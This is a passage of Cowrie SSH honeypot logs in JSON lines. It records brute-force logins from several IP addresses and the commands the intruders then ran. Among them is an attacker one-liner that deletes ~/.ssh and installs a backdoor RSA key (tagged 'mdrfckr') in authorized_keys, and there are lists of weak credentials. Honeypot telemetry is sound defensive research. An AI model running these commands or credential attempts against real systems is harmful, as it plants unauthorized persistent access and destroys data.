compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:50:55.528811Z","src_ip":"217.154.1.158","session":"4936f2725580"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:50:55.573510Z","src_ip":"217.154.1.158","session":"4936f2725580"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:50:55.660969Z","src_ip":"217.154.1.158","session":"4936f2725580"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:50:55.661719Z","src_ip":"217.154.1.158","session":"4936f2725580"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:55.677608Z","src_ip":"217.154.1.158","session":"4936f2725580"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:55.678582Z","src_ip":"217.154.1.158","session":"4936f2725580"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35340,"dst_ip":"1.2.3.4","dst_port":22,"session":"bee81c539aef","protocol":"ssh","message":"New connection: 217.154.1.158:35340 (1.2.3.4:22) [session: bee81c539aef]","sensor":"my-vps","timestamp":"2025-08-26T19:51:13.214221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:51:13.215366Z","src_ip":"217.154.1.158","session":"bee81c539aef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:51:13.229594Z","src_ip":"217.154.1.158","session":"bee81c539aef"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:51:13.273804Z","src_ip":"217.154.1.158","session":"bee81c539aef"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:14.290014Z","src_ip":"217.154.1.158","session":"bee81c539aef"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":50278,"dst_ip":"1.2.3.4","dst_port":22,"session":"4307d07eec0b","protocol":"ssh","message":"New connection: 217.154.1.158:50278 (1.2.3.4:22) [session: 4307d07eec0b]","sensor":"my-vps","timestamp":"2025-08-26T19:51:30.905164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:51:30.906049Z","src_ip":"217.154.1.158","session":"4307d07eec0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:51:30.920237Z","src_ip":"217.154.1.158","session":"4307d07eec0b"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T19:51:30.975028Z","src_ip":"217.154.1.158","session":"4307d07eec0b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:31.996681Z","src_ip":"217.154.1.158","session":"4307d07eec0b"}
{"eventid":"cowrie.session.connect","src_ip":"210.79.190.46","src_port":39080,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d470be716af","protocol":"ssh","message":"New connection: 210.79.190.46:39080 (1.2.3.4:22) [session: 8d470be716af]","sensor":"my-vps","timestamp":"2025-08-26T19:51:40.621013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:51:40.622044Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:51:40.887577Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.login.success","username":"root","password":"User@123","message":"login attempt [root/User@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:51:42.541070Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:51:43.088349Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:51:43.089003Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:51:43.090495Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:43.365072Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:51:44.025903Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:51:44.026827Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:51:44.300249Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:44.301299Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.session.connect","src_ip":"210.79.190.46","src_port":39084,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dc89cc5c56a","protocol":"ssh","message":"New connection: 210.79.190.46:39084 (1.2.3.4:22) [session: 9dc89cc5c56a]","sensor":"my-vps","timestamp":"2025-08-26T19:51:44.560217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:51:44.561244Z","src_ip":"210.79.190.46","session":"9dc89cc5c56a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:51:44.830486Z","src_ip":"210.79.190.46","session":"9dc89cc5c56a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:51:45.948169Z","src_ip":"210.79.190.46","session":"9dc89cc5c56a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:47.219634Z","src_ip":"210.79.190.46","session":"9dc89cc5c56a"}
{"eventid":"cowrie.session.connect","src_ip":"210.79.190.46","src_port":59598,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e6af2797359","protocol":"ssh","message":"New connection: 210.79.190.46:59598 (1.2.3.4:22) [session: 4e6af2797359]","sensor":"my-vps","timestamp":"2025-08-26T19:51:47.483639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:51:47.484692Z","src_ip":"210.79.190.46","session":"4e6af2797359"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:51:47.747379Z","src_ip":"210.79.190.46","session":"4e6af2797359"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":56138,"dst_ip":"1.2.3.4","dst_port":22,"session":"73d3459b33ea","protocol":"ssh","message":"New connection: 199.195.248.191:56138 (1.2.3.4:22) [session: 73d3459b33ea]","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.286861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.299630Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.394177Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35864,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dbfae65478c","protocol":"ssh","message":"New connection: 217.154.1.158:35864 (1.2.3.4:22) [session: 2dbfae65478c]","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.442025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.443078Z","src_ip":"217.154.1.158","session":"2dbfae65478c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.458984Z","src_ip":"217.154.1.158","session":"2dbfae65478c"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.502545Z","src_ip":"217.154.1.158","session":"2dbfae65478c"}
{"eventid":"cowrie.login.success","username":"root","password":"xsw2XSW@","message":"login attempt [root/xsw2XSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.749837Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.844153Z","src_ip":"210.79.190.46","session":"4e6af2797359"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:51:48.960176Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.961021Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:51:48.962260Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.059247Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.109405Z","src_ip":"210.79.190.46","session":"4e6af2797359"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.111088Z","src_ip":"210.79.190.46","session":"8d470be716af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:51:49.352677Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.353506Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
